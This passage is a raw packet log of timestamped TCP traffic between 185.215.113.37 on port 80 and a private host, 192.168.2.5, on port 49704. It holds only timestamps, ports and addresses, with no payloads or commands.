Sep 27, 2024 04:14:15.199091911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199101925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199129105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199186087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199269056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199278116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199287891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199299097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199352980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199407101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199424982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199443102 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199459076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199481010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199636936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199681044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199691057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199700117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199722052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199739933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199776888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199786901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199798107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199826956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199855089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199881077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199897051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199909925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199942112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199970007 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199984074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199994087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200006008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200042009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200067997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200119972 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200130939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200165033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200167894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200177908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200185061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200193882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200203896 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200213909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200227022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200227022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200299025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200344086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200355053 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200365067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200373888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200404882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200404882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200436115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200490952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200500011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200509071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200519085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200529099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200535059 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200539112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200547934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200575113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200619936 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200766087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200777054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200787067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200797081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200807095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200814009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200817108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200829029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200839043 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.200859070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200859070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.200881958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201031923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201042891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201052904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201062918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201072931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201081991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201092005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201102018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201106071 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201107025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201123953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201155901 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201345921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201355934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201370001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201380014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201390028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201396942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201400042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201411009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201421022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201430082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201441050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201447964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201447964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201452971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201462984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201472998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201483965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201487064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201487064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201503992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201508999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201529980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201558113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201812029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201828957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201839924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201849937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201858997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201868057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201873064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201873064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201878071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201889038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201898098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.201915026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201915026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.201934099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230704069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230751991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230761051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230766058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230796099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230798960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230815887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230827093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230838060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230839014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230839014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230863094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230899096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.230926037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230936050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.230974913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231012106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231023073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231034040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231061935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231105089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231151104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231162071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231172085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231183052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231194019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231204033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231204033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231204987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231251955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231251955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231372118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231389999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231400967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231415033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.231436014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231465101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.231465101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232498884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232523918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232532978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232537985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232553959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232583046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232619047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232628107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232637882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232650995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232665062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232665062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232724905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232759953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232759953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232830048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232841015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232851028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232861996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232872963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232898951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232898951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.232965946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.232976913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.233023882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.233023882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291382074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291400909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291413069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291475058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291482925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291493893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291503906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291503906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291517019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291543961 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291567087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291615963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291626930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291632891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291644096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291680098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291680098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291754961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291764975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291775942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291784048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291807890 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291807890 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291868925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.291933060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291985035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291995049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.291996956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292031050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292031050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292071104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292083025 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292093039 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292104006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292119980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292119980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292161942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292172909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292202950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292234898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292234898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292270899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292282104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292292118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292318106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292318106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292354107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292362928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292371988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292399883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292473078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292484045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292494059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292500019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292500019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292501926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292512894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292519093 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292524099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292557001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292577028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292635918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292645931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292681932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292692900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292702913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292735100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292898893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292915106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292926073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292934895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292943001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292946100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.292984962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.292984962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293051004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293061018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293071032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293078899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293086052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293088913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293098927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293108940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293118954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293128014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293135881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293135881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293291092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293299913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293309927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293318033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293319941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293319941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293328047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293338060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293346882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293374062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293376923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293376923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293384075 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293392897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293402910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293411016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293421030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293431044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293443918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293443918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293446064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293473005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293555975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293780088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293790102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293834925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293834925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293930054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293941975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293950081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293960094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293961048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.293970108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293978930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293988943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.293998957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294006109 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294006109 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294008970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294018984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294034958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294044018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294048071 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294048071 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294054031 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294066906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294089079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294089079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294233084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294349909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294361115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294370890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.294393063 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294393063 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.294444084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.323827982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.323853016 CEST	80	49704	185.215.113.37	192.168.2.5
